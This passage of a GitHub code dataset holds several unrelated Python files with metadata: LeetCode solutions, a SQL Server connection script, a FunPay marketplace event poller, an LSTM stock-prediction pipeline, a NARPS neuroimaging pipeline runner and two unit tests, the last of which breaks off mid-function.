[[-1, 0], [1, 0], [0, 1], [0, -1]]\n\n for p in positions:\n x, y = p.x, p.y\n dsu.addLand(index(x, y))\n\n for dr, dc in directions:\n dx, dy = x + dr, y + dc\n if dx in range(m) and dy in range(n) and dsu.isLand[index(dx, dy)]:\n dsu.union(index(x, y), index(dx, dy))\n\n res.append(dsu.count)\n return res\n\n\nif __name__ == '__main__':\n n = 8\n m = 14\n A = [[0,9],[5,4],[0,12],[6,9],[6,5],[0,4],[4,11],[0,0],[3,5],[6,7],[3,12],[0,5],[6,13],[7,5],[3,6],[4,4],[0,8],[3,1],[4,6],[6,1],[5,12],[3,8],[7,0],[2,9],[1,4],[3,0],[1,13],[2,13],[6,0],[6,4],[0,13],[0,3],[7,4],[1,8],[5,5],[5,7],[5,10],[5,3],[6,10],[6,2],[3,10],[2,7],[1,12],[5,0],[4,5],[7,13],[3,2]]\n operators = [Point(x, y) for x, y in A]\n print(Solution().numIslands2(n, m, operators))\n","repo_name":"amogchandrashekar/Leetcode","sub_path":"Medium/Number of Islands II.py","file_name":"Number of Islands II.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"18742035905","text":"import pyodbc\n\ndados_conexao = (\n 'DRIVER={ODBC Driver 18 for SQL Server}'\n 'SERVER=bigniga\\sqltalisson;'\n 'DATABASE=SQL_BD_1;'\n 'Trusted_Connection=yes;'\n)\n\nconexao = pyodbc.connect(dados_conexao)\nprint('Conexão Bem Sucedida')","repo_name":"talissonEloia/SQL","sub_path":"SQL_SERVER_TROVATO/Conect SQL to python com pyodbc.py","file_name":"Conect SQL to python com pyodbc.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"31448511763","text":"\"\"\"\nВ данном модуле написан класс Runner'а.\n\"\"\"\n\nfrom bs4 import BeautifulSoup\nfrom typing import Iterator\nfrom copy import deepcopy\nimport traceback\nimport requests\nimport logging\nimport json\nimport time\n\nfrom . import utils\nfrom . import types\nfrom . import account\nfrom . import exceptions\n\n\nlogger = logging.getLogger(\"FunPayAPI.runner\")\n\n\nclass Runner:\n \"\"\"\n Класс для получения новых событий с FunPay.\n \"\"\"\n def __init__(self, account_instance: account.Account, timeout: float | int = 10.0):\n \"\"\"\n :param account_instance: экземпляр класса аккаунта.\n\n :param timeout: тайм-аут ожидания ответа на запросы.\n \"\"\"\n self.account = account_instance\n self.timeout = timeout\n\n self.last_message_event_tag = utils.gen_random_tag()\n self.last_order_event_tag = utils.gen_random_tag()\n\n self.saved_messages: dict[int, types.Message] = {}\n self.saved_orders: dict[str, types.Order] = {}\n\n self.first_request = True\n self.session = requests.session()\n\n def get_updates(self) -> list[types.NewMessageEvent | types.NewOrderEvent | types.OrderStatusChangedEvent]:\n \"\"\"\n Получает и парсит список событий FunPay.\n\n :return: список событий.\n \"\"\"\n if not self.account.is_authorized():\n raise exceptions.NotAuthorized()\n\n orders = {\n \"type\": \"orders_counters\",\n \"id\": self.account.id,\n \"tag\": self.last_order_event_tag,\n \"data\": False\n }\n chats = {\n \"type\": \"chat_bookmarks\",\n \"id\": self.account.id,\n \"tag\": self.last_message_event_tag,\n \"data\": False\n }\n payload = {\n \"objects\": json.dumps([orders, chats]),\n \"request\": False,\n \"csrf_token\": self.account.csrf_token\n }\n headers = {\n \"accept\": \"*/*\",\n \"cookie\": f\"golden_key={self.account.golden_key}; PHPSESSID={self.account.session_id}\",\n \"content-type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\n \"x-requested-with\": \"XMLHttpRequest\",\n \"user-agent\": self.account.user_agent\n }\n response = self.session.post(types.Links.RUNNER, headers=headers, data=payload, timeout=self.timeout,\n proxies=self.account.proxy)\n logger.debug(f\"Статус-код получения данных о событиях: {response.status_code}.\")\n if response.status_code != 200:\n raise exceptions.StatusCodeIsNot200(response.status_code)\n\n json_response = response.json()\n logger.debug(f\"Получены данные о событиях: {json_response}\")\n\n events = []\n\n for obj in json_response[\"objects\"]:\n if obj.get(\"type\") == \"chat_bookmarks\":\n if not self.first_request:\n events.append(types.MessagesListChangedEvent(self.last_message_event_tag))\n self.last_message_event_tag = obj.get(\"tag\")\n self.account.update_chats(obj[\"data\"][\"html\"])\n soup = BeautifulSoup(obj[\"data\"][\"html\"], \"html.parser\")\n messages = soup.find_all(\"a\", {\"class\": \"contact-item\"})\n\n for msg in messages:\n unread = True if \"unread\" in msg.get(\"class\") else False\n node_id = int(msg[\"data-id\"])\n message_text = msg.find(\"div\", {\"class\": \"contact-item-message\"}).text\n # Если это старое сообщение (сохранено в self.last_messages) -> пропускаем.\n if node_id in self.saved_messages:\n last_msg = self.saved_messages[node_id]\n if last_msg.text == message_text:\n continue\n\n chat_with = msg.find(\"div\", {\"class\": \"media-user-name\"}).text\n message_obj = types.Message(message_text, node_id, chat_with, unread, True)\n if self.first_request:\n event = types.InitialMessageEvent(message_obj, self.last_message_event_tag)\n else:\n event = types.NewMessageEvent(message_obj, self.last_message_event_tag)\n events.append(event)\n self.saved_messages[message_obj.node_id] = message_obj\n\n elif obj.get(\"type\") == \"orders_counters\":\n self.last_order_event_tag = obj.get(\"tag\")\n if not self.first_request:\n events.append(types.OrdersListChangedEvent(obj[\"data\"][\"buyer\"], obj[\"data\"][\"seller\"],\n self.last_order_event_tag))\n attempts = 3\n while attempts:\n try:\n orders_list = self.account.get_orders(include_outstanding=True, include_refund=True,\n include_completed=True)\n break\n except exceptions.StatusCodeIsNot200 as e:\n logger.error(e)\n attempts -= 1\n time.sleep(1)\n except:\n logger.error(\"Не удалось обновить список ордеров.\")\n logger.debug(\"------TRACEBACK------\", exc_info=True)\n attempts -= 1\n time.sleep(1)\n if not attempts:\n logger.error(\"Не удалось обновить список ордеров: превышено кол-во попыток.\")\n return []\n\n for order in orders_list:\n if order.id not in self.saved_orders:\n if self.first_request:\n event = types.InitialOrderEvent(order, self.last_order_event_tag)\n events.append(event)\n else:\n event = types.NewOrderEvent(order, self.last_order_event_tag)\n events.append(event)\n if order.status == types.OrderStatuses.COMPLETED:\n event2 = types.OrderStatusChangedEvent(order, self.last_order_event_tag)\n events.append(event2)\n self.update_saved_order(order)\n elif order.status != self.saved_orders[order.id].status:\n event = types.OrderStatusChangedEvent(order_obj=order, tag=self.last_order_event_tag)\n events.append(event)\n self.update_saved_order(order)\n\n if self.first_request:\n self.first_request = False\n\n return events\n\n def update_saved_message(self, message_obj: types.Message) -> None:\n \"\"\"\n Обновляет последнее сохраненное сообщение.\n\n :param message_obj: экземпляр класса, описывающего сообщение.\n \"\"\"\n message_copy = deepcopy(message_obj)\n message_copy.text = message_copy.text.replace(\"[a][/a]\", \"\")\n message_copy.text = message_copy.text[:250]\n self.saved_messages[message_copy.node_id] = message_copy\n\n def update_saved_order(self, order: types.Order) -> None:\n \"\"\"\n Обновляет последнее сохраненное состояние заказа.\n\n :param order: экземпляр класса, описывающего заказа.\n \"\"\"\n self.saved_orders[order.id] = order\n\n def listen(self, delay: float | int = 6.0, ignore_exceptions: bool = True) \\\n -> Iterator[types.Event]:\n \"\"\"\n \"Слушает\" FunPay в ожидании новых событий.\n\n :param delay: задержка между запросами.\n\n :param ignore_exceptions: игнорировать ошибки при выполнении запросов.\n \"\"\"\n if not self.account.is_authorized():\n raise exceptions.NotAuthorized()\n\n while True:\n try:\n updates = self.get_updates()\n for event in updates:\n yield event\n except Exception as e:\n if not ignore_exceptions:\n raise e\n else:\n logger.error(\"Произошла ошибка при получении событий \"\n \"(ничего страшного, если это сообщение появляется нечасто).\")\n logger.debug(\"------TRACEBACK------\", exc_info=True)\n time.sleep(delay)\n","repo_name":"WinCorVD/FunPayAuto","sub_path":"FunPayAPI/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":9057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72565055554","text":"'''\n\nDescription:\n\nGiven a m x n grid filled with non-negative numbers, find a path from top left to bottom right which minimizes the sum of all numbers along its path.\n\nNote: You can only move either down or right at any point in time.\n\nExample:\n\nInput:\n[\n [1,3,1],\n [1,5,1],\n [4,2,1]\n]\nOutput: 7\nExplanation: Because the path 1→3→1→1→1 minimizes the sum.\n\n'''\n\n\n\nfrom typing import List\n\nclass Solution:\n def minPathSum(self, grid: List[List[int]]) -> int:\n \n h, w = len(grid), len(grid[0])\n \n # first column\n for y in range(1, h):\n grid[y][0] = grid[y-1][0] + grid[y][0]\n\n # first row \n for x in range(1, w):\n grid[0][x] = grid[0][x-1] + grid[0][x]\n\n # general case \n for y in range(1, h):\n for x in range(1, w):\n grid[y][x] = min( grid[y-1][x], grid[y][x-1]) + grid[y][x]\n \n \n return grid[-1][-1]\n \n\n\n# m : the dimension of column of grid\n# n : the dimension of row of grid\n\n## Time Complexity: O( m * n)\n#\n# The overhead in time is the nested loop interating on grid, which is of O( m * n ).\n\n## Space Complexity: O( 1 )\n#\n# The update of dp_table is in-place, thus the cost of space is of O( 1 ).\n\nfrom collections import namedtuple\nTestEntry = namedtuple('TestEntry', 'cost_matrix')\n\ndef test_bench():\n\n test_data = [\n TestEntry( cost_matrix = [\n [1,3,1],\n [1,5,1],\n [4,2,1]\n ]\n ),\n \n TestEntry( cost_matrix = [\n [5,6],\n [7,4]\n ]\n ),\n ]\n\n # expected output:\n '''\n 7\n 15\n '''\n\n for t in test_data:\n\n print( Solution().minPathSum( grid = t.cost_matrix ) )\n \n return\n\n\n\nif __name__ == '__main__':\n\n test_bench()","repo_name":"brianchiang-tw/leetcode","sub_path":"2020_April_Leetcode_30_days_challenge/Week_3_Minimum Path Sum/by_in-place_dynamic_programming.py","file_name":"by_in-place_dynamic_programming.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"} +{"seq_id":"73231539073","text":"from carga import models\nfrom django.db.utils import IntegrityError\nimport openpyxl\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n# certificado_obra \n# certificado_financiamiento \n# certificado_rubro \n# certificado_rubro_anticipo \n# certificado_rubro_obra \n# certificado_rubro_devanticipo \n# certificado_expediente \n# certificado_periodo \n# certificado_monto_pesos \n# certificado_mes_pct \n# certificado_ante_pct \n# certificado_acum_pct \n# certificado_devolucion_expte \n# certificado_devolucion_monto \n# certificado_devolucion_monto_uvi\n# certificado_monto_uvi \n# certificado_fecha \n# certificado_monto_cobrar \n# certificado_monto_cobrar_uvi \n# certificado_digital \n\ncertificados = models.Certificado.objects.all()\n\nexpedientes = []\n\nfor certificado in certificados:\n if certificado.certificado_expediente not in expedientes:\n print(f\"{certificado.certificado_expediente} not in list, appending it.\") \n expedientes.append(certificado.certificado_expediente)\n\nprint(f\"{bcolors.OKGREEN}Pending re-run.{bcolors.ENDC}\")\nprint(f\"{bcolors.OKGREEN}Re-running...{bcolors.ENDC}\")\n\nfor certificado in certificados:\n if certificado.certificado_expediente not in expedientes:\n print(f\"{certificado.certificado_expediente} not in list, appending it.\") \n expedientes.append(certificado.certificado_expediente)\n\nprint(f\"{bcolors.OKBLUE}Done.{bcolors.ENDC}\")\nprint(expedientes)\n\n","repo_name":"WillyLobo/Polizador-Production","sub_path":"scripts/expedientes.py","file_name":"expedientes.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73829309635","text":"import logging\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\nimport keras as keras\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Dense, LSTM\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import train_test_split\nfrom pathlib import Path\n\nfrom timeseries import wrangle\nfrom timeseries import fetch\nfrom timeseries import BuildModel\n\n\n\ndef run_fetch_raw_data(ticker='GOOG'):\n \n \"\"\" \n Get raw data from yfinance and \n \"\"\"\n\n logging.info('Fetching raw data from yfinance')\n \n # touch data directory\n try:\n Path('./data').mkdir()\n print('Data directory successfully created')\n except:\n print('Data Directory already exists')\n \n # touch raw data directory\n try:\n Path('./data/raw').mkdir()\n print('Creating directory for raw data')\n except FileExistsError:\n print('Directory for raw data already exists')\n \n \n \n # Define Constants\n #TICKER = \"GOOG\"\n TICKER = ticker\n #START = \"2004-08-19\" # Google IPO date\n START = \"1900-01-01\"\n TODAY = datetime.date(datetime.now()).strftime(\"%Y-%m-%d\")\n OUTPUT_FILE_NAME = \"raw.csv\"\n #OUTPUT_FILE_PATH = \"~/springboard1/capstone2/TimeSeries/data/raw/\" + OUTPUT_FILE_NAME\n OUTPUT_FILE_PATH = \"./data/raw/\" + OUTPUT_FILE_NAME\n #Path('OUTPUT_FILE_PATH').touch()\n\n # get all current google stock data\n stock_data = fetch.get_historical_data(TICKER, START, TODAY)\n\n # log population of csv file\n logging.info(\"Writing yfinance data to \" + OUTPUT_FILE_PATH)\n print(\"Writing yfinance data to \" + OUTPUT_FILE_PATH)\n\n # write data to csv\n stock_data.to_csv(OUTPUT_FILE_PATH)\n \n return\n \ndef run_format_timeseries():\n print('formatting timeseries')\n # raw data file path\n RAW_DATA_FILE_PATH = \"./data/raw/raw.csv\"\n\n # read csv data from\n raw_df = pd.read_csv(RAW_DATA_FILE_PATH, index_col=0, parse_dates=['Date'])\n\n\n adj_close_df = raw_df.iloc[:,4:5]\n\n\n log_scaled_adj_close = wrangle.take_log(adj_close_df)\n log_scaled_adj_close, deltas = wrangle.get_deltas(log_scaled_adj_close)\n\n #previous_df = wrangle.create_previous_days(log_scaled_adj_close, 'Adj Close')\n\n def create_time_series(df, col_name='Adj Close'):\n df = wrangle.create_previous_days(df, col_name)\n #df = create_future_days(df, col_name)\n return df\n\n # touch interim data directory\n try:\n Path('./data/interim').mkdir()\n print('Creating directory for interim data')\n except FileExistsError:\n print('Directory for interim data already exists')\n \n time_series_df = create_time_series(log_scaled_adj_close, 'Adj Close')\n time_series_df.to_csv('./data/interim/time_series.csv')\n #time_series_df.to_csv('../data/interim/time_series.csv')\n print('DONE')\n\n\ndef run_predict_tomorrow():\n # PREPARE DATA\n TEST_SIZE = 0.05\n file_path = './data/interim/time_series.csv'\n\n # read time series data\n time_series_df = BuildModel.read_data(file_path)\n\n\n # extract last row to predict tomorrow's change\n tomorrow = time_series_df.iloc[[-1]].fillna(0)\n\n # call function to format predictors and targets\n tomorrow, _ , _ = BuildModel.format_predictors_and_targets(tomorrow)\n predictors, targets, n_cols = BuildModel.format_predictors_and_targets(time_series_df)\n\n\n # scale data to range [0,1]\n\n # create scaler objects\n X_scaler = MinMaxScaler(feature_range=(0,1))\n y_scaler = MinMaxScaler(feature_range=(0,1))\n\n # fit respective scalers to data\n predictors = X_scaler.fit_transform(predictors)\n tomorrow = X_scaler.transform(tomorrow)\n targets = y_scaler.fit_transform(targets)\n\n\n # test for correct scaling\n assert min(predictors.flatten()) == 0\n assert max(predictors.flatten()) == 1\n assert min(targets.flatten()) == 0\n assert max(targets.flatten()) == 1\n\n\n # split data into training set and testing set\n # SHUFFLE = FALSE\n X_train, X_test, y_train, y_test = train_test_split(predictors, targets, test_size=TEST_SIZE, shuffle=False, stratify=None, random_state=1)\n\n # test for sequential split\n assert np.argwhere(predictors == X_train[-1])[0][0] == (np.argwhere(predictors == X_test[0])[0][0]) -1\n assert np.argwhere(predictors == y_train[-1])[0][0] == (np.argwhere(predictors == y_test[0])[0][0]) -1\n\n\n # BUILD MODEL\n\n # re-shape predictors for keras model\n tomorrow = np.reshape(tomorrow, (1, 1, tomorrow.shape[1]))\n X_train = np.reshape(X_train, (X_train.shape[0], 1, X_train.shape[1]))\n X_test = np.reshape(X_test, (X_test.shape[0], 1, X_test.shape[1]))\n\n assert X_train.shape[1:] == tomorrow.shape[1:]\n\n # DEFINE MODEL CONSTANTS\n N_NODES = 100\n N_LAYERS = 4\n ADD_DENSE = True\n\n\n # build Sequential Model\n model = BuildModel.build_sequential_LSTM(N_NODES, N_LAYERS, ADD_DENSE, X_train)\n\n\n # Fit the Model Exclusively with Training Data\n\n # DEFINE TRAINING CONSTANTS\n EPOCHS = 2\n\n # fit model to training data\n model.fit(X_train, y_train, epochs=EPOCHS)\n\n\n # save and load model\n save_model = False\n if save_model:\n model.save('./models/keras_lstm.h5')\n model = load_model('./models/keras_lstm.h5')\n\n\n # Make Predictions and interpret results\n\n # Make Predictions\n predictions = model.predict(X_test)\n tomorrows_prediction = model.predict(tomorrow)\n\n # revert scaling\n tomorrow_unscaled = y_scaler.inverse_transform(tomorrows_prediction)\n unscaled_predictions = y_scaler.inverse_transform(predictions)\n unscaled_y_test = y_scaler.inverse_transform(y_test)\n\n # apply exponential function\n exponential_tomorrow = np.exp(tomorrow_unscaled)\n exponential_predictions = np.exp(unscaled_predictions)\n exponential_y_test = np.exp(unscaled_y_test)\n\n # Inspect Quality of Predictions\n # Inspect quality of predictions\n places = 4\n min_pred = round(float(min(exponential_predictions)), places)\n max_pred = round(float(max(exponential_predictions)), places)\n mean_pred = round(float(np.mean(exponential_predictions)), places)\n median_pred = round(float(np.median(exponential_predictions)), places)\n percentile = round(np.percentile(exponential_predictions, 1.0), places)*100\n print(\"min pred:\\t\", min_pred)\n print(\"max pred:\\t\", max_pred)\n print(\"mean pred:\\t\", mean_pred)\n print(\"median pred:\\t\", median_pred)\n print(\"percentile(1.0):\", percentile)\n\n\n is_good_model = min_pred<=1.0 and max_pred>=1.0\n assert is_good_model\n\n\n # SCORE MODEL\n\n # get accuracy\n accuracy = BuildModel.get_accuracy(exponential_y_test, exponential_predictions)\n\n\n # TOMORROW'S PREDICTIONS\n\n def action(x):\n \"\"\"\n params: expected change in stock price\n\n Map to expected changes in the action column\n\n Return: \"Buy\" if expected increase, \"SELL\" if expected decrease\n \"\"\"\n if x>0:\n return \"BUY\"\n else:\n return \"SELL\"\n\n # read original Adj Close Data\n # read data with Adj Close Price\n raw_data = pd.read_csv('./data/raw/raw.csv', index_col=['Date'])\n\n # display a dataFrame providing insight to th user\n expected_return = float(exponential_tomorrow)\n tomorrow_df = raw_data[['Adj Close']].iloc[[-1]]\n tomorrow_df.columns = ['price_today']\n tomorrow_df['price_tomorrow'] = tomorrow_df['price_today']* expected_return\n tomorrow_df['Action'] = (tomorrow_df.price_tomorrow - tomorrow_df.price_today).map(action)\n print(tomorrow_df)\n\n","repo_name":"AHalarewicz/TimeSeriesAnalysis","sub_path":"timeseries/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":7557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11146000389","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Luna Ganzáles Rocio y Martinez Garcia Isabel\n\"\"\"\nimport json\nAngrafo = False\n\nwith open(\"anchuraarbol.json\", \"r\") as read_file:\n data = json.load(read_file)\n Angrafo = data['angrafo'] \n \ndef recorinodo(tomavla):\n a = 0 \n nodo =[]\n grafo = []\n for n in Angrafo:\n grafo = grafo+[n[\"rama\"].split()]\n nodo = nodo+[n[\"nodo\"].split()]\n for n in grafo:\n print (nodo[a],grafo[a][0])\n if (grafo[a][0] == tomavla):\n return True\n a +=1\n \nrearbol = recorinodo(\"30\")\nif (rearbol == True):\n print (\"Raiz\")","repo_name":"Isabel-Mtz/ProgramasUnidad3","sub_path":"ArbolE1.py","file_name":"ArbolE1.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25589237158","text":"#!/usr/bin/python\n# coding: utf-8\n\n\"\"\" This module allows to run pipelines from NARPS open. \"\"\"\n\nfrom os.path import isfile\nfrom importlib import import_module\nfrom random import choices\nfrom argparse import ArgumentParser\n\nfrom nipype import Workflow\n\nfrom narps_open.pipelines import Pipeline, implemented_pipelines\nfrom narps_open.data.participants import (\n get_all_participants,\n get_participants,\n get_participants_subset\n )\nfrom narps_open.utils.configuration import Configuration\n\nclass PipelineRunner():\n \"\"\" A class that allows to run a NARPS pipeline. \"\"\"\n\n def __init__(self, team_id: str = '') -> None:\n self._pipeline = None\n\n # Set team_id. It's important to use the property setter here,\n # so that the code inside it is executed. That would not be the\n # case if simply setting the `self._team_id` attribute i.e.: `self._team_id = team_id`\n self.team_id = team_id\n\n @property\n def pipeline(self) -> Pipeline:\n \"\"\" Getter for property pipeline \"\"\"\n return self._pipeline\n\n @property\n def subjects(self) -> list:\n \"\"\" Getter for property subjects \"\"\"\n return self._pipeline.subject_list\n\n @subjects.setter\n def subjects(self, value: list) -> None:\n \"\"\" Setter for property subjects \"\"\"\n\n all_participants = get_all_participants()\n for subject_id in value:\n if str(int(subject_id)).zfill(3) not in all_participants:\n raise AttributeError(f'Subject ID {subject_id} is not valid')\n\n self._pipeline.subject_list = list(dict.fromkeys(\n [str(int(subject_id)).zfill(3) for subject_id in value])) # remove duplicates\n\n @subjects.setter\n def random_nb_subjects(self, value: int) -> None:\n \"\"\" Setter for property random_nb_subjects \"\"\"\n # Generate a random list of subjects\n self._pipeline.subject_list = choices(get_participants(self.team_id), k = value)\n\n @subjects.setter\n def nb_subjects(self, value: int) -> None:\n \"\"\" Setter for property nb_subjects \"\"\"\n # Get a subset of participants\n self._pipeline.subject_list = get_participants_subset(value)\n\n @property\n def team_id(self) -> str:\n \"\"\" Getter for property team_id \"\"\"\n return self._team_id\n\n @team_id.setter\n def team_id(self, value: str) -> None:\n \"\"\" Setter for property random_nb_subjects \"\"\"\n self._team_id = value\n\n # It's up to the PipelineRunner to find the right pipeline, based on the team ID\n if self._team_id not in implemented_pipelines:\n raise KeyError(f'Wrong team ID : {self.team_id}')\n\n if implemented_pipelines[self._team_id] is None:\n raise NotImplementedError(f'Pipeline not implemented for team : {self.team_id}')\n\n # Instantiate the pipeline\n class_type = getattr(\n import_module('narps_open.pipelines.team_'+self._team_id),\n implemented_pipelines[self._team_id])\n self._pipeline = class_type()\n\n def start(self, first_level_only: bool = False, group_level_only: bool = False) -> None:\n \"\"\"\n Start the pipeline\n\n Arguments:\n - first_level_only: bool (False by default), run the first level workflows only,\n (= preprocessing + run level + subject_level)\n - group_level_only: bool (False by default), run the group level workflows only\n \"\"\"\n print('Starting pipeline for team: '+\n f'{self.team_id}, with {len(self.subjects)} subjects: {self.subjects}')\n\n if first_level_only and group_level_only:\n raise AttributeError('first_level_only and group_level_only cannot both be True')\n\n # Generate workflow list\n workflow_list = []\n if not group_level_only:\n workflow_list += [\n self._pipeline.get_preprocessing(),\n self._pipeline.get_run_level_analysis(),\n self._pipeline.get_subject_level_analysis(),\n ]\n if not first_level_only:\n workflow_list += [\n self._pipeline.get_group_level_analysis()\n ]\n\n nb_procs = Configuration()['runner']['nb_procs']\n\n # Launch workflows\n for workflow in workflow_list:\n if workflow is None:\n pass\n elif isinstance(workflow, list):\n for sub_workflow in workflow:\n if not isinstance(sub_workflow, Workflow):\n raise AttributeError('Workflow must be of type nipype.Workflow')\n\n if nb_procs > 1:\n sub_workflow.run('MultiProc', plugin_args={'n_procs': nb_procs})\n else:\n sub_workflow.run()\n else:\n if not isinstance(workflow, Workflow):\n raise AttributeError('Workflow must be of type nipype.Workflow')\n\n if nb_procs > 1:\n workflow.run('MultiProc', plugin_args={'n_procs': nb_procs})\n else:\n workflow.run()\n\n def get_missing_first_level_outputs(self):\n \"\"\" Return the list of missing files after computations of the first level \"\"\"\n files = self._pipeline.get_preprocessing_outputs()\n files += self._pipeline.get_run_level_outputs()\n files += self._pipeline.get_subject_level_outputs()\n\n return [f for f in files if not isfile(f)]\n\n def get_missing_group_level_outputs(self):\n \"\"\" Return the list of missing files after computations of the group level \"\"\"\n files = self._pipeline.get_group_level_outputs()\n\n return [f for f in files if not isfile(f)]\n\nif __name__ == '__main__':\n\n # Parse arguments\n parser = ArgumentParser(description='Run the pipelines from NARPS.')\n parser.add_argument('-t', '--team', type=str, required=True,\n help='the team ID')\n subjects = parser.add_mutually_exclusive_group(required=True)\n subjects.add_argument('-s', '--subjects', nargs='+', type=str, action='extend',\n help='a list of subjects to be selected')\n subjects.add_argument('-n', '--nsubjects', type=str,\n help='the number of subjects to be selected')\n subjects.add_argument('-r', '--rsubjects', type=str,\n help='the number of subjects to be selected randomly')\n levels = parser.add_mutually_exclusive_group(required=False)\n levels.add_argument('-g', '--group', action='store_true', default=False,\n help='run the group level only')\n levels.add_argument('-f', '--first', action='store_true', default=False,\n help='run the first levels only (preprocessing + subjects + runs)')\n parser.add_argument('-c', '--check', action='store_true', required=False,\n help='check pipeline outputs (runner is not launched)')\n arguments = parser.parse_args()\n\n # Initialize a PipelineRunner\n runner = PipelineRunner(team_id = arguments.team)\n runner.pipeline.directories.dataset_dir = Configuration()['directories']['dataset']\n runner.pipeline.directories.results_dir = Configuration()['directories']['reproduced_results']\n runner.pipeline.directories.set_output_dir_with_team_id(arguments.team)\n runner.pipeline.directories.set_working_dir_with_team_id(arguments.team)\n\n # Handle subject\n if arguments.subjects is not None:\n runner.subjects = arguments.subjects\n elif arguments.rsubjects is not None:\n runner.random_nb_subjects = int(arguments.rsubjects)\n else:\n runner.nb_subjects = int(arguments.nsubjects)\n\n # Check data\n if arguments.check:\n missing_files = []\n print('Missing files for team', arguments.team, 'after running',\n len(runner.pipeline.subject_list), 'subjects:')\n if not arguments.group:\n print('First level:', runner.get_missing_first_level_outputs())\n if not arguments.first:\n print('Group level:', runner.get_missing_group_level_outputs())\n\n # Start the runner\n else:\n runner.start(arguments.first, arguments.group)\n","repo_name":"Inria-Empenn/narps_open_pipelines","sub_path":"narps_open/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":8085,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"23547088811","text":"for t in range(1, int(input())+1):\n s, k = input().split()\n s, k, steps = list(s), int(k), 0\n while s:\n if s[0] == '+':\n del s[0]\n else:\n if len(s) < k:\n break\n else:\n steps += 1\n for i in range(k):\n s[i] = '+' if s[i] == '-' else '-'\n #print(s)\n print('Case #{:d}: {:s}'.format(t, str(steps) if not s else 'IMPOSSIBLE'))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/3659.py","file_name":"3659.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30713176188","text":"from pathlib import Path\nfrom typing import List\n\nfrom chunked_scatter.chunked_scatter import BedRegion, \\\n region_lists_to_scatter_files\n\n\ndef test_bed_writer(tmpdir):\n temp = Path(str(tmpdir))\n temp.rmdir() # Delete to test if function makes the dir.\n region_lists: List[List[BedRegion]] = [\n [BedRegion(\"sparta\", 0, 300),\n BedRegion(\"persians\", 0, 100_000)],\n # But if you actually read Herodotus, the story seems much more likely:\n [BedRegion(\"sparta_and_allies\", 0, 4300),\n BedRegion(\"persian_casualties\", 0, 20000)]\n ]\n\n region_lists_to_scatter_files(region_lists, str(temp / \"scatter-\"))\n assert Path(temp, \"scatter-0.bed\").exists()\n assert Path(temp, \"scatter-0.bed\").read_text() == (\n \"sparta\\t0\\t300\\npersians\\t0\\t100000\\n\")\n assert Path(temp, \"scatter-1.bed\").exists()\n assert Path(temp, \"scatter-1.bed\").read_text() == (\n \"sparta_and_allies\\t0\\t4300\\npersian_casualties\\t0\\t20000\\n\")\n","repo_name":"biowdl/chunked-scatter","sub_path":"tests/test_bed_writer.py","file_name":"test_bed_writer.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36046138714","text":"__metaclass__ = type\n\nfrom lp.services.database.multitablecopy import MultiTableCopy\nfrom lp.services.log.logger import DevNullLogger\nfrom lp.testing import TestCaseWithFactory\nfrom lp.testing.faketransaction import FakeTransaction\nfrom lp.testing.layers import ZopelessDatabaseLayer\nfrom lp.translations.model.distroseries_translations_copy import (\n copy_active_translations,\n )\n\n\nclass EarlyExit(Exception):\n \"\"\"Exception used to force early exit from the copying code.\"\"\"\n def __init__(self, *args, **kwargs):\n self.args = args\n self.kwargs = kwargs\n\n\ndef force_exit(*args, **kwargs):\n \"\"\"Raise `EarlyExit`.\"\"\"\n raise EarlyExit(*args, **kwargs)\n\n\nclass TestDistroSeriesTranslationsCopying(TestCaseWithFactory):\n\n layer = ZopelessDatabaseLayer\n\n def test_does_not_overwrite_existing_pofile(self):\n # Sometimes a POFile we're about to copy to a new distroseries\n # has already been created there due to message sharing. In\n # that case, the copying code leaves the existing POFile in\n # place and does not copy it. (Nor does it raise an error.)\n existing_series = self.factory.makeDistroSeries(name='existing')\n new_series = self.factory.makeDistroSeries(\n name='new', distribution=existing_series.distribution,\n previous_series=existing_series)\n template = self.factory.makePOTemplate(distroseries=existing_series)\n pofile = self.factory.makePOFile(potemplate=template)\n self.factory.makeCurrentTranslationMessage(\n language=pofile.language, potmsgset=self.factory.makePOTMsgSet(\n potemplate=template))\n\n # Sabotage the pouring code so that when it's about to hit the\n # POFile table, it returns to us and we can simulate a race\n # condition.\n pour_table = MultiTableCopy._pourTable\n\n def pour_or_stop_at_pofile(self, holding_table, table, *args,\n **kwargs):\n args = (self, holding_table, table) + args\n if table.lower() == \"pofile\":\n raise EarlyExit(*args, **kwargs)\n else:\n return pour_table(*args, **kwargs)\n\n 